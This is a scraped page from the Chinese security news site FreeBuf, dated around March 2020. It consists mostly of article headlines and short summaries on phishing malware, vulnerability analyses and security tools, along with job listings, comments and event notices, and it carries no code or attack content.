零信任架构实战系列:如何选择零信任架构
小议安全
何艺 8802
从甲方安全视角,实战出发,对企业安全建设、网络安全、零信任、安全管理、分析进行沉…

关注

揭秘“史上最大数据窃取案”背后的技术团队
网安大护法
IRONMAN娄大壮 141250
网络安全 数据合规 安全界的护法者

关注

使用Python批量扫描Amazon S3 Bucket配置问题
kali渗透测试笔记
Scorpio君临天下 211352
渗透测试团队的成长记录

关注

Gartner 2020与未来战略预测
宇宸的研究室
宇宸de研究室 285145
安全合规、体系模型、新兴技术趋势关注和研究

关注

细品新政策法规下的APP个人信息收集检测
TideSec
TideSec 303824
Tide安全团队,期待您的加入。www.TideSec.com

关注

零信任架构实战系列:如何选择零信任架构
小议安全
何艺 8802
从甲方安全视角,实战出发,对企业安全建设、网络安全、零信任、安全管理、分析进行沉…

关注

资深Web安全工程师
经验 3-5年 /本科25k-50k
http://image.3001.net/images/20171116/15108160439576.png!small
平安银行

上市公司 / 1000+ / 深圳市

高级web安全工程师
经验 5-10年 /本科20k-50k
http://image.3001.net/images/20171120/15111698472106.png!small
腾讯

不需要融资 / 1-50 / 深圳市

渗透测试工程师 漏洞挖掘方向
经验 1-3年 /大专15k-50k
http://image.3001.net/images/20171107/1510066054284.png!small
阿里巴巴

不需要融资 / 1000+ / 杭州市

更多职位
Zeus Sphinx恶意软件重现,利用COVID-19救济款进行网络钓鱼资讯
Zeus Sphinx恶意软件重现,利用COVID-19救济款进行网络钓鱼Sandra14322020-03-31 近期发现Zeus Sphinx银行木马程序在沉寂了三年后重新回归人们视线——以冠状病毒为主题开展网络钓鱼活动。COVID-19是目前网络攻击最为常见、最为流行的主题。资讯已有 3990 人围观 ,发现 3 个不明物体Goby——新一代安全工具工具
Goby——新一代安全工具cliekkas2020-03-31 Goby是一款新的网络安全测试工具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描。工具已有 11282 人围观 ,发现 2 个不明物体挖洞经验 | 劫持Google Data Studio的共享报告链接WEB安全
挖洞经验 | 劫持Google Data Studio的共享报告链接clouds专栏作者2020-03-31 这篇Writeup介绍了谷歌数据报表平台Google Data Studio中的一个授权漏洞,作者利用该漏洞可以修改其他人分享的报告链接,实现对他人报告的劫持。WEB安全漏洞已有 9923 人围观 ,发现 3 个不明物体招聘|陌陌安全暑期实习指南安全招聘
招聘|陌陌安全暑期实习指南陌陌安全2020-03-31 陌陌安全致力于以务实的工作保障陌陌旗下所有产品及亿万用户的信息安全,以开放的心态拥抱信息安全机构、团队与个人之间的共赢协作,以自由的氛围和丰富的资源支撑优秀同学的个人发展与职业成长。?安全招聘已有 5570 人围观 ,发现 3 个不明物体基于风险的应用程序安全方法可增强安全防御网络安全
基于风险的应用程序安全方法可增强安全防御Sandra14322020-03-31 如今,不可否认的是网络犯罪已逐渐进入人们的生活,为人们所重视。无论何时,随意浏览新闻都能看到新漏洞的发现,或者是敏感信息的泄露、窃取等。网络安全已有 7709 人围观 ,发现 2 个不明物体
潜心学习的小白帽
21588 关注 | 117 文章
关注
最新更新:ThinkPHP系列漏洞之ThinkPHP 2.x 任意代码执行斗哥将带来ThinkPHP各个版本的漏洞分析文章。
i春秋学院
16102 关注 | 398 文章
关注
最新更新:新手篇丨Web安全入门之WebGoat8.0环境搭建网安学习绝非一朝一夕,这期间我们除了知识的积累,更重要的是进行实践,只有在实践中学会发现问题,解决问
兜哥带你学安全
14916 关注 | 23 文章
关注
最新更新:关于云租户安全建设的思路分享随着企业云化的深入,安全策略成为企业云上建设需要着重考虑的问题,如何安全有效的使用云计算开展自己的业
换一批
FreeBuf早报 | 沙特在美国从事监听活动,追踪其公民手机位置;美国中小企业遭遇以行政捐助为诱饵的网络钓鱼;部分企业采购间谍软件监视远程工作的雇员资讯
FreeBuf早报 | 沙特在美国从事监听活动,追踪其公民手机位置;美国中小企业遭遇以行政捐助为诱饵的网络钓鱼;部分企业采购间谍软件监视远程工作的雇员Sandra14322020-03-31 1月下旬,俄语黑客利用恶意软件攻击了至少两家欧洲制药公司。根据攻击工具,可以看出黑客可能是像Silence和TA505这样的以金钱为目标的组织团体。资讯已有 14501 人围观 ,发现 4 个不明物体Docker守护进程安全配置介绍企业安全
Docker守护进程安全配置介绍白河·愁2020-03-31 现金奖励 本文将为大家介绍docker守护进程的相关安全配置项目。企业安全已有 17513 人围观 ,发现 3 个不明物体阿里安全投放广告?阿里巴巴发布新一代安全架构:让数字基建的每块砖安全可溯源
阿里巴巴发布新一代安全架构:让数字基建的每块砖安全可溯源“新基建”带来了新的发展机遇,也对网络空间安全带来了全新的挑战。两个多月新冠疫情磨砺,让加快发展数字化成为社会共识,以5G、数据中心等为代表的新型基础设施建设,也成为经济复苏的新路径。今晚7点线上直播|攻方视角下的攻击路线及实际案例FreeBuf公开课
今晚7点线上直播|攻方视角下的攻击路线及实际案例FB独家认证作者2020-03-30 3月31日(明天)晚上19:00,来自斗象科技高级安全服务工程师余礼龙将为大家带来主题为《攻方视角下的攻击路线及实际案例》的分享。FreeBuf公开课已有 20827 人围观 ,发现 2 个不明物体Shiro权限绕过漏洞分析(CVE-2020-1957)WEB安全
Shiro权限绕过漏洞分析(CVE-2020-1957)斗象智能安全平台认证厂商2020-03-30 2020年3月23号,Shiro开发者Brian Demers在用户社区发表帖子,提醒shiro用户进行安全更新,本次更新进行了三个修复,其中就包括了对编号为CVE-2020-1957的Shrio授权绕过漏洞的修复。WEB安全漏洞已有 30455 人围观 ,发现 6 个不明物体Multi-Juicer:针对OWASP Juice Shop的多用户CTF及安全培训平台网络安全
Multi-Juicer:针对OWASP Juice Shop的多用户CTF及安全培训平台Alpha_h4ck2020-03-30 Multi-Juicer是一款帮助用户结合OWASP Juice Shop来运行CTF以及安全培训的多用户平台工具集。网络安全已有 20045 人围观 ,发现 2 个不明物体让你的SQL盲注快起来WEB安全
让你的SQL盲注快起来dongne2020-03-30 现金奖励 SQL 注入是当前 Web 安全中最常见的安全问题之一,其危害性也比较大,众多白帽子在渗透测试过程中往往会首先着重进行 SQL 注入的测试。WEB安全已有 101424 人围观 ,发现 33 个不明物体查看更多

饿了么麦当劳豆瓣电影网易云音乐
一切成就都缘于一个
梦想和毫无根据的自信。
7×24 快讯
Elizabeth Warren 竞选团队开源其软件
11小时前
美政府被曝利用移动广告定位数据研究新冠病毒传播
11小时前
沙特在美国从事监听活动,追踪其公民手机位置
13小时前
Zoom 宣布从其 iOS 客户端移除 Facebook SDK
2天前
Dharma勒索软件的源代码在黑客论坛开售
2天前
因发布虚假新冠病毒声明 Infowars Android应用遭谷歌下架
2天前
黑客给疫情添乱,多国专家联手反黑
2天前
华为等向联合国提议重构互联网:提议采用一种新的核心网络技术新标准“New IP”
2天前
Google 发出了4万次国家支持黑客攻击警告
2天前
Google Chrome 将逐步停止支持 user agent
5天前
Loading…
热点专题

等保2.0,你准备好了吗?
12-03 13:30

等保2.0正式实施,这些重点帮你划好了详情>>

FreeBuf企业安全系列报告专题
03-20 13:45

预告|FreeBuf企业安全系列之《2020国内抗DDoS产品研究报告》即将发布详情>>

RSAC 2020专题报道
03-03 10:15

从RSAC看DevSecOps的进化与落地思考详情>>

斗象智能安全研究专栏
01-20 18:49

基于机器学习的恶意软件加密流量检测研究分享详情>>

等保2.0,你准备好了吗?
12-03 13:30

等保2.0正式实施,这些重点帮你划好了详情>>

FreeBuf企业安全系列报告专题
03-20 13:45

预告|FreeBuf企业安全系列之《2020国内抗DDoS产品研究报告》即将发布详情>>

亮了最新评论
《女黑客1亿美元叫卖AMD源码》

JosefStalin 说: 女黑客没想到所谓的源码只是一些化肥配方 ?

2020-03-27)12(亮了

《信息安全意识培训可以这样做》

绿帽子技术分享 说: 给员工进行安全意识的入门培训挺不错的,希望有更完善的PPT能直接分享一下

2020-03-30)12(亮了

《Github疑似遭中间人劫持,网友反馈访问报证书错误》

Delectate 说: 这次是因为证书做的不够完美所以露馅了,如果证书很完美,是ca颁发的,可以说99.99%的人无从察觉,从容实施中间人攻击。 所以我认为,做一个常见网站的“证书认证插件”迫在眉睫。在客户端确认,服务器的这个证书是否可信,而不是中间人伪造的。

2020-03-27)11(亮了

《女黑客1亿美元叫卖AMD源码》

雅丽Camilla 说: P5天下第一

2020-03-26)8(亮了

《收到包含泰迪熊和USB的礼物包裹?来自FIN7 APT组织的“阴谋”》

zomsh 说: 留下泰迪熊,扔掉usb

2020-03-30)8(亮了

黑客制造
Projectsandcastle:一款针对iPhone的AndroidLinux支持工具 Projectsandcastle:一款针对iPhone的AndroidLinux支持工具Projectsandcastle:一款针对iPhone的AndroidLinux支持工具
Prev
Next
最新作者更多

cliekkas
《Goby——新一代安全工具》

郑瀚AndrewHann
《阿里云安全能力建设团队社招&校招》

Doraemon
《惨遭删库,这笔账应该怎么算?》

艾尔等保之道
《云服务客户落实网络安全等级保护2.0》

中国评测网安中心 认证厂商
中国评测网安中心
《抗疫期间,等保工作开展指南》

Heihu577
我菜
《通读审计之AACMS》
政府专区政府专区系FreeBuf为国家网络信息安全相关政府机构独立开设的特别栏目,发布权威资讯、政策与观点,为国家网信安全提供坚实媒体支撑
最新话题安全从业者该去甲方还是乙方安全从业者该去甲方还是乙方softgirl 推荐:之所以有这么多人问,更多的是折射出大家对甲方安全工作和乙方安全工作的未知,不知道哪个更适合自己,更深层次的意识可能是对自身职业发展的不确定。
推荐关注

官方公众号

聚焦企业安全

官方QQ群 FreeBuf官方微博
活动预告
3月

纯实战化攻防教学 | 玩转黑客操作系统Blackarch
3月26日
3月

合规、技术、实践,从隐私保护走向数据安全
3月23日
3月

冠军选手帮你把CTF知识点各个击破
3月12日
3月

CTF之web安全入门
3月12日
服务推荐
订阅周刊
订阅周刊

安全报告
安全报告

寻求报道
寻求报道

视频推荐更多
BUF大事件丨黑客1亿美元叫卖AMD源码;Pwn2Own 2020春季赛落下帷幕;淘宝出现“内测版本将到期” 弹窗Bug

BUF大事件丨微博泄露事件卧底调查报告:隐私一览无余;Intel处理器曝新漏洞:打补丁性能骤降77%

BUF大事件丨天猫超市大数据“杀熟”?官方网友在线Battle;新版个人信息安全规范正式发布,隐私安全得到高度重视

BUF大事件丨实锤!涉美CIA攻击组织对我国发起网络攻击;国家互联网信息办公室:禁止网络暴力、人肉搜索

合作媒体

合作伙伴腾讯TSRC|虎嗅网|搜狐科技|OWASP中国|xKungFoo|15pb|i春秋|SecWIKI|安全客|百度安全|极验|2020上海网络安全博览会

本站由阿里云 提供计算与安全服务

官方QQ群:590717869

用户服务有奖投稿申请专栏提交漏洞参与众测商城企业服务甲方会员厂商会员企业空间企业SRC漏洞众测智能安全合作信息寻求报道广告投放联系我们友情链接关于我们关于我们加入我们
微信公众号
新浪微博赞助商
FreeBuf+小程序
扫码把安全装进口袋

斗象科技FreeBuf漏洞盒子斗象智能安全平台免责条款协议条款Copyright ? 2020 WWW.FREEBUF.COM All Rights Reserved 沪公网安备 31011502009321号
css.php正在加载中…0daybank